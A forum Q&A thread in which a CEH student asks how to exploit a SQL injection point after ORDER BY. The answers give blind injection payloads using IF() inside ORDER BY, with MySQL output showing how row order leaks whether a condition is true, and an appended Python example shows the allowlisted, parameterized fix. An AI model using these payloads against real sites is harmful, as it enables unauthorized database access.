I found that one of my demo websites is vulnerable to SQL INJECTION (I am currently doing the CEH).
The injection point found is as follows:
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [*INJECTION POINT FOUND HERE*]
Now I need to make something that will help me exploit the injection point I found. As far as I know, UNION SELECT does not work after ORDER BY. However, I do think blind SQL injection might work as follows:
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [if 1=1 then 1,blank]
Now, if 1 is posted at the injection point, the query gives an error, whereas if it is left blank, the query executes... so blind SQL injection would work.
Can someone help me build a query using IF THEN ELSE in SQL, because I don't know how to use IF THEN ELSE in SQL..
Tried the following but it does not work properly:
(IF(1 = 2) then 1 endif)
Full query:
SELECT column_1, column_2, column_3 from `table_1` WHERE `column_4` = '[*available injection point*]' order by id [*available injection point*] ASC limit [*available injection point*],[*available injection point*]
Answer 0: (score: 0)
If id is not unique in the result set, and there is another column whose value is unique for each id, you can do the following:
, unique_per_id
identifies a unique order for each id value (it must be different from id; if necessary, use id with desc).
, IF(1=1,unique_per_id,id)
allows boolean-based blind injection. Example:
mysql> select host,user from mysql.user order by user;
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,host;
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=1,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=0,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
So, as long as the order of the result set with if(expr,host,user) is the same as the order with host alone (the second query), the condition expr is true.
Answer 1: (score: -1)
You can inject:
+ IF(1=1, 1, 0)
The resulting query would be:
SELECT column_1,column_2,column_3
from table_1
where column_4='3'
order by id + IF(1=1, 1, 0)
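As an added example (not from the question or either answer), here is the hardened form of the question's query in Python with sqlite3: the WHERE value and the LIMIT operands are bound parameters, while the ORDER BY column and direction, which cannot be bound, are checked against an allowlist so payloads like the ones above are rejected before any SQL is built. The table_1 schema and rows are constructed for the demo.

```python
import sqlite3

# Constructed sample schema mirroring the question's table_1 (column_1..column_4 plus id);
# the rows are invented for this demo.
SCHEMA = """
CREATE TABLE table_1 (
    id INTEGER PRIMARY KEY,
    column_1 TEXT, column_2 TEXT, column_3 TEXT, column_4 TEXT
);
INSERT INTO table_1 (column_1, column_2, column_3, column_4) VALUES
    ('a1', 'b1', 'c1', '3'),
    ('a2', 'b2', 'c2', '3'),
    ('a3', 'b3', 'c3', '4');
"""

# Identifiers in ORDER BY cannot be bound as parameters, so the safe approach is a fixed
# allowlist: anything not in it (e.g. "id, IF(1=1,column_1,id)") is rejected outright.
ALLOWED_SORT_COLUMNS = {"id", "column_1", "column_2", "column_3"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def build_query(sort_col: str, direction: str) -> str:
    """Return the SELECT with an allowlisted ORDER BY; WHERE/LIMIT/OFFSET stay bound."""
    if sort_col not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"rejected sort column: {sort_col!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected sort direction: {direction!r}")
    return (
        "SELECT column_1, column_2, column_3 FROM table_1 "
        f"WHERE column_4 = ? ORDER BY {sort_col} {direction} LIMIT ? OFFSET ?"
    )


def fetch_rows(conn, column_4, sort_col, direction, limit, offset):
    """Run the query; limit/offset are coerced to ints, so '1,2' fails in int() first."""
    limit, offset = int(limit), int(offset)
    if limit < 0 or offset < 0:
        raise ValueError("limit/offset must be non-negative")
    sql = build_query(sort_col, direction)
    return conn.execute(sql, (column_4, limit, offset)).fetchall()


def open_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


if __name__ == "__main__":
    conn = open_demo_db()
    print(fetch_rows(conn, "3", "column_1", "desc", 10, 0))
```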